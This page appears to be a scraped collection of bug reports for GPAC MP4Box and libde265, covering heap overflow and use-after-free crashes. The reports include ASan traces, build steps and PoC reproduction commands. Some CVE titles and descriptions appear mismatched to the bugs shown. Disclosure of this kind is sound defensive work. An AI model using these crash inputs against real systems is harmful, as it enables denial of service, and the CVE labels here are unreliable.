    [iso file] Box "stsd" size 171 (start 1439) invalid (read 192)
    Floating point exception
    

gdb info

![1625476927(1)](https://user-images.githubusercontent.com/83855894/124471055-ffd3bc80-ddce-11eb-8902-1e7c60e568bb.png)

asan info

    =================================================================
    ==967870==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000001874 at pc 0x7f3a53c0836c bp 0x7ffcce36e790 sp 0x7ffcce36e780
    READ of size 4 at 0x602000001874 thread T0
        #0 0x7f3a53c0836b in gf_isom_get_3gpp_audio_esd isomedia/media.c:104
        #1 0x7f3a53c0836b in Media_GetESD isomedia/media.c:330
        #2 0x7f3a53b1ac04 in gf_isom_get_decoder_config isomedia/isom_read.c:1329
        #3 0x7f3a53b56d2e in gf_isom_guess_specification isomedia/isom_read.c:4035
        #4 0x5602827ad1d1 in HintFile /home/.../gpac/gpac-master-A/applications/mp4box/main.c:3379
        #5 0x5602827c4d54 in mp4boxMain /home/.../gpac/gpac-master-A/applications/mp4box/main.c:6297
        #6 0x7f3a52d080b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #7 0x560282777f1d in _start (/home/.../gpac/gpac-master-A/bin/gcc/MP4Box+0x48f1d)
    
    0x602000001874 is located 3 bytes to the right of 1-byte region [0x602000001870,0x602000001871)
    allocated by thread T0 here:
        #0 0x7f3a55be6bc8 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dbc8)
        #1 0x7f3a539e10ec in stts_box_read isomedia/box_code_base.c:5788
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow isomedia/media.c:104 in gf_isom_get_3gpp_audio_esd
    Shadow bytes around the buggy address:
      0x0c047fff82b0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
      0x0c047fff82c0: fa fa fd fd fa fa fd fd fa fa fd fa fa fa 00 00
      0x0c047fff82d0: fa fa 01 fa fa fa 00 00 fa fa 00 00 fa fa 00 00
      0x0c047fff82e0: fa fa 00 00 fa fa 01 fa fa fa 00 00 fa fa 00 00
      0x0c047fff82f0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
    =>0x0c047fff8300: fa fa 00 00 fa fa 00 fa fa fa 00 00 fa fa[01]fa
      0x0c047fff8310: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa
      0x0c047fff8320: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
      0x0c047fff8330: fa fa 01 fa fa fa 00 00 fa fa 00 00 fa fa 00 00
      0x0c047fff8340: fa fa 00 00 fa fa fd fd fa fa fd fd fa fa fd fd
      0x0c047fff8350: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==967870==ABORTING

CVE-2021-36414: heap buffer overflow issue with gpac MP4Box · Issue #1840 · gpac/gpac

A heap-based buffer overflow vulnerability exists in MP4Box in GPAC 1.0.1 via the gp_rtp_builder_do_mpeg12_video function, which allows attackers to possibly have unspecified other impact via a crafted file in the MP4Box command,

Hello,  
A heap-buffer-overflow has occurred when running program MP4Box,this can reproduce on the lattest commit.  
System info：  
Ubuntu 20.04.1 : clang 10.0.0 , gcc 9.3.0

poc1.zip

Verification steps：  
1.Get the source code of gpac  
2.Compile

    cd gpac-master
    CC=gcc CXX=g++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" ./configure
    make
    

3.run MP4Box

    ./MP4Box -hint poc -out /dev/null
    

asan info

    =================================================================
    ==2631249==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000001bd4 at pc 0x7f2ac7fe5b9b bp 0x7ffc4389ba70 sp 0x7ffc4389ba60
    READ of size 1 at 0x602000001bd4 thread T0
        #0 0x7f2ac7fe5b9a in gp_rtp_builder_do_mpeg12_video ietf/rtp_pck_mpeg12.c:156
        #1 0x7f2ac889948a in gf_hinter_track_process media_tools/isom_hinter.c:808
        #2 0x559f0eb8ae2b in HintFile /home/.../gpac/gpac-master/applications/mp4box/main.c:3499
        #3 0x559f0eba1d54 in mp4boxMain /home/.../gpac/gpac-master/applications/mp4box/main.c:6297
        #4 0x7f2ac74d10b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #5 0x559f0eb54f1d in _start (/home/.../gpac/gpac-master/bin/gcc/MP4Boxfl+0x48f1d)
    
    0x602000001bd4 is located 0 bytes to the right of 4-byte region [0x602000001bd0,0x602000001bd4)
    allocated by thread T0 here:
        #0 0x7f2aca3afbc8 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dbc8)
        #1 0x7f2ac83d56cd in Media_GetSample isomedia/media.c:617
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow ietf/rtp_pck_mpeg12.c:156 in gp_rtp_builder_do_mpeg12_video
    Shadow bytes around the buggy address:
      0x0c047fff8320: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
      0x0c047fff8330: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fd
      0x0c047fff8340: fa fa fd fd fa fa fd fd fa fa fd fa fa fa 00 00
      0x0c047fff8350: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
      0x0c047fff8360: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
    =>0x0c047fff8370: fa fa 00 00 fa fa 00 00 fa fa[04]fa fa fa fa fa
      0x0c047fff8380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8390: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff83a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff83b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff83c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==2631249==ABORTING
    

source code of rtp\_pck\_mpeg12.c

    143 max_pck_size = builder->Path_MTU - 4;
    144
    145	payload = data + offset;
    146	pic_type = (payload[1] >> 3) & 0x7;
    147	/*first 6 bits (MBZ and T bit) not used*/
    148	/*temp ref on 10 bits*/
    149	mpv_hdr[0] = (payload[0] >> 6) & 0x3;
    150	mpv_hdr[1] = (payload[0] << 2) | ((payload[1] >> 6) & 0x3);
    151	mpv_hdr[2] = pic_type;
    152	mpv_hdr[3] = 0;
    153
    154	if ((pic_type==2) || (pic_type== 3)) {
    155		mpv_hdr[3] = (u8) ((((u32)payload[3]) << 5) & 0xf);
    156		if ((payload[4] & 0x80) != 0) mpv_hdr[3] |= 0x10;
    157		if (pic_type == 3) mpv_hdr[3] |= (payload[4] >> 3) & 0xf;
    158	}

CVE-2021-36412: A heap-buffer-overflow in function gp_rtp_builder_do_mpeg12_video · Issue #1838 · gpac/gpac

An issue was discovered in libde265 v1.0.8.There is a Heap-use-after-free in intrapred.h when decoding file using dec265.

Hello,  
A Heap-use-after-free has occurred when running program dec265  
System info：  
Ubuntu 20.04.1 : clang 10.0.0 , gcc 9.3.0

Dec265 v1.0.8

poc.zip

Verification steps：  
1.Get the source code of libde265  
2.Compile

    cd libde265
    mkdir build && cd build
    cmake ../ -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_CXX_FLAGS="fsanitize=address"
    make -j 32
    

3.run dec265

asan info

    =================================================================
    ==1538158==ERROR: AddressSanitizer: heap-use-after-free on address 0x625000007e04 at pc 0x7efe5f2b9526 bp 0x7ffceaaa13c0 sp 0x7ffceaaa13b0
    READ of size 4 at 0x625000007e04 thread T0
        #0 0x7efe5f2b9525 in intra_border_computer<unsigned char>::fill_from_image() /home/dh/sda3/libde265-master/libde265-master/libde265/intrapred.h:552
        #1 0x7efe5f2ba6e9 in void fill_border_samples<unsigned char>(de265_image*, int, int, int, int, unsigned char*) /home/dh/sda3/libde265-master/libde265-master/libde265/intrapred.cc:260
        #2 0x7efe5f2ba6e9 in void decode_intra_prediction_internal<unsigned char>(de265_image*, int, int, IntraPredMode, unsigned char*, int, int, int) /home/dh/sda3/libde265-master/libde265-master/libde265/intrapred.cc:284
        #3 0x7efe5f2a5383 in decode_intra_prediction(de265_image*, int, int, IntraPredMode, int, int) /home/dh/sda3/libde265-master/libde265-master/libde265/intrapred.cc:335
        #4 0x7efe5f31dc52 in decode_TU /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:3453
        #5 0x7efe5f342e76 in read_transform_unit(thread_context*, int, int, int, int, int, int, int, int, int, int, int, int) /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:3665
        #6 0x7efe5f347191 in read_transform_tree(thread_context*, int, int, int, int, int, int, int, int, int, int, int, PredMode, unsigned char, unsigned char) /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:3942
        #7 0x7efe5f34e119 in read_coding_unit(thread_context*, int, int, int, int) /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:4575
        #8 0x7efe5f3548f2 in read_coding_quadtree(thread_context*, int, int, int, int) /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:4652
        #9 0x7efe5f354357 in read_coding_quadtree(thread_context*, int, int, int, int) /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:4635
        #10 0x7efe5f356564 in decode_substream(thread_context*, bool, bool) /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:4741
        #11 0x7efe5f358ddb in read_slice_segment_data(thread_context*) /home/dh/sda3/libde265-master/libde265-master/libde265/slice.cc:5054
        #12 0x7efe5f23dd75 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:843
        #13 0x7efe5f240c0f in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:945
        #14 0x7efe5f241715 in decoder_context::decode_some(bool*) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:730
        #15 0x7efe5f24695e in decoder_context::decode(int*) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:1329
        #16 0x55990c1348fd in main /home/dh/sda3/libde265-master/libde265-master/dec265/dec265.cc:764
        #17 0x7efe5ed950b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #18 0x55990c13776d in _start (/home/dh/sda3/libde265-master/libde265-master/dec265+0xa76d)
    
    0x625000007e04 is located 1284 bytes inside of 8600-byte region [0x625000007900,0x625000009a98)
    freed by thread T0 here:
        #0 0x7efe5f6408df in operator delete(void*) (/lib/x86_64-linux-gnu/libasan.so.5+0x1108df)
        #1 0x7efe5f24b576 in std::_Sp_counted_ptr_inplace<pic_parameter_set, std::allocator<pic_parameter_set>, (__gnu_cxx::_Lock_policy)2>::_M_destroy() /usr/include/c++/9/ext/new_allocator.h:128
        #2 0x7efe5f4d996f  (/home/dh/sda3/libde265-master/libde265-master/build/libde265/liblibde265.so+0x37d96f)
    
    previously allocated by thread T0 here:
        #0 0x7efe5f63f947 in operator new(unsigned long) (/lib/x86_64-linux-gnu/libasan.so.5+0x10f947)
        #1 0x7efe5f22cf3f in std::shared_ptr<pic_parameter_set> std::make_shared<pic_parameter_set>() /usr/include/c++/9/ext/new_allocator.h:114
        #2 0x7efe5f22cf3f in decoder_context::read_pps_NAL(bitreader&) /home/dh/sda3/libde265-master/libde265-master/libde265/decctx.cc:572
        #3 0x7efe5b1ff7ff  (<unknown module>)
        #4 0x614fffffffff  (<unknown module>)
    
    SUMMARY: AddressSanitizer: heap-use-after-free /home/dh/sda3/libde265-master/libde265-master/libde265/intrapred.h:552 in intra_border_computer<unsigned char>::fill_from_image()
    Shadow bytes around the buggy address:
      0x0c4a7fff8f70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c4a7fff8f80: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c4a7fff8f90: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c4a7fff8fa0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c4a7fff8fb0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
    =>0x0c4a7fff8fc0:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c4a7fff8fd0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c4a7fff8fe0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c4a7fff8ff0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c4a7fff9000: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c4a7fff9010: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==1538158==ABORTING

Tag

#ubuntu